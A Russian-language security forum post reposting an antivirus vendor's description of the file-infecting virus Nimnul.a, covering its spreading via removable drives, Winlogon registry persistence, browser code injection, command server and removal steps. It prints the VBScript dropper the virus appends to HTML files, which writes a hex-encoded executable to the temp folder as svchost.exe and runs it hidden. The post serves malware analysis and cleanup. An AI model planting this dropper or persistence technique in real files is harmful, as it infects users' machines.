Добро пожаловать на независимую площадку Stop Malware.
Показано с 1 по 1 из 1

Тема: Virus.Win32.Nimnul.a

Понравилась статья? Поделись с друзьями!
  1. #1
    Аватар для x-sis
    x-sis
    x-sis вне форума

    Местный
    Регистрация
    11.07.2011
    Адрес
    Россия, Волгоград
    Сообщений
    185
    Поблагодарил(а)
    52
    Благодарностей
    124

    Восклицание Virus.Win32.Nimnul.a

    Технические детали

    Вредоносная программа, заражающая файлы на компьютере пользователя, и предоставляющая злоумышленнику удаленный доступ к зараженной машине. Является приложением Windows (PE-EXE файл). Имеет размер 62464 байта. Упакована UPX и неизвестным упаковщиком. Распакованный размер – около 75 КБ. Написана на C++.

    Распространение

    Копия вредоноса создается на всех доступных для записи съемных дисках, подключаемых к зараженному компьютеру, в каталоге:

    <имя зараженного диска>:\Recycler

    Также в корне диска создается файл

    <имя зараженного диска>:\autorun.inf

    обеспечивающий вредоносу возможность запускаться каждый раз, когда пользователь открывает зараженный раздел при помощи программы "Проводник".



    Деструктивная активность

    После запуска вредонос для контроля уникальности своего процесса в системе создает уникальный идентификатор с именем:

    KyUffThOkYwRRtgPP

    Также проверяется имя исполняемого файла вредоноса. Если имя отлично от "DesktopLayer.exe", тело вредоноса копируется в файл:

    %Program Files%\Microsoft\DesktopLayer.exe

    после чего, запускается на выполнение. Также каталог "Microsoft", содержащий копию вредоноса, может создаваться в каталогах:

    %HOMEDRIVE%
    %HOMEPATH%
    %APPDATA%
    %System%
    %WinDir%
    %Temp%


    После запуска вредонос запускает браузер, установленный в системе по умолчанию, и внедряет в адресное пространство его процесса исполняемый код, реализующий весь деструктивный функционал. Внедряемый код реализует выполнение следующих действий:

    для автоматического запуска созданной ранее копии вредоноса изменяется значение ключа системного реестра:

    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Userinit" = "%System%\userinit.exe,,%Program Files%\microsoft\
    desktoplayer.exe"


    Таким образом, копия будет запускаться процессом "WINLOGON.EXE" даже при запуске компьютера в "безопасном режиме".
    Предотвращается модификация ключа автозапуска реестра, а также файла "DesktopLayer.exe".
    Заражаются файлы с расширениями:

    htm
    dll
    exe


    При заражении EXE и DLL файлов тело вируса дописывается в конец последней PE-секции целевого файла. При этом точка входа в программу изменяется таким образом, чтобы вирусное тело получало управление первым. HTM файлы заражаются путем дописывания в конец целевого файла скрипта следующего содержания:

    <SCRIPT Language=VBScript><!--
    DropFileName = "svchost.exe"
    WriteData = "4D5A… (тело вредоноса)"
    Set FSO = CreateObject("Scripting.FileSystemObject")
    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
    If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
    End If
    Set WSHshell = CreateObject("WScript.Shell")
    WSHshell.Run DropPath, 0
    //--></SCRIPT>


    Таким образом, при каждом запуске скрипта в каталоге хранения временных файлов текущего пользователя будет создаваться и запускаться на выполнение копия вредоноса:

    %Temp%\svchost.exe

    Зараженные HTML-страницы детектируются Антивирусом Касперского как "Trojan-Dropper.VBS.Agent.bp".
    В рабочем каталоге исполняемого файла браузера создается конфигурационный файл "dmlconf.dat".
    Для получения команд устанавливается соединение с сервером:

    fget-ca***r.com

    По полученной от злоумышленника команде вредонос может выполнять следующие действия:
    загружать на зараженный компьютер файлы и запускать их на выполнение.
    соединяться с другим сервером для получения команд.

    Рекомендации по удалению

    Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

    1. При помощи Диспетчера задач http://support.kaspersky.ru/faq/?qid=208635583 завершить процесс установленного по умолчанию браузера.

    2. Восстановить значение ключа системного реестра (как работать с реестром http://support.kaspersky.ru/faq/?qid=208635566 ):

    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Userinit" = "userinit.exe"


    3. Удалить файлы:

    %Program Files%\Microsoft\DesktopLayer.exe
    %Temp%\svchost.exe
    <имя зараженного диска>:\Recycler
    <имя зараженного диска>:\autorun.inf


    4. Удалить оригинальный файл вредоноса (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).

    Не запускать EXE, HTM файлы и не перезагружать компьютер до полной проверки зараженного компьютера антивирусом.

    5. Очистить каталог Temporary Internet Files http://support.kaspersky.ru/viruses/...?qid=180593120, который может содержать инфицированные файлы.

    6. Произвести полную проверку компьютера Антивирусным ПО с обновлёнными базами.

    Источник: http://www.securelist.com/ru/descrip...Win32.Nimnul.a
    Последний раз редактировалось x-sis; 12.08.2011 в 22:16.
    http://ProvisionSecurity.ru - об информационных технологиях, о жизни, обо всём.

  2. 1 пользователь сказал cпасибо x-sis за это полезное сообщение:

    Александр (12.08.2011)

 

 

Похожие темы

  1. Обзор Virus.Win32.Virut.ce
    от x-sis в разделе Компьютерные зловреды
    Ответов: 6
    Последнее сообщение: 15.11.2011, 01:17
  2. Обзор Virus.Win32.Expiro.w
    от x-sis в разделе Компьютерные зловреды
    Ответов: 1
    Последнее сообщение: 03.11.2011, 01:29
  3. Virus.Win32.Virut.ce
    от Александр в разделе Описание вирусов
    Ответов: 1
    Последнее сообщение: 26.10.2011, 00:54

Социальные закладки

Социальные закладки

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •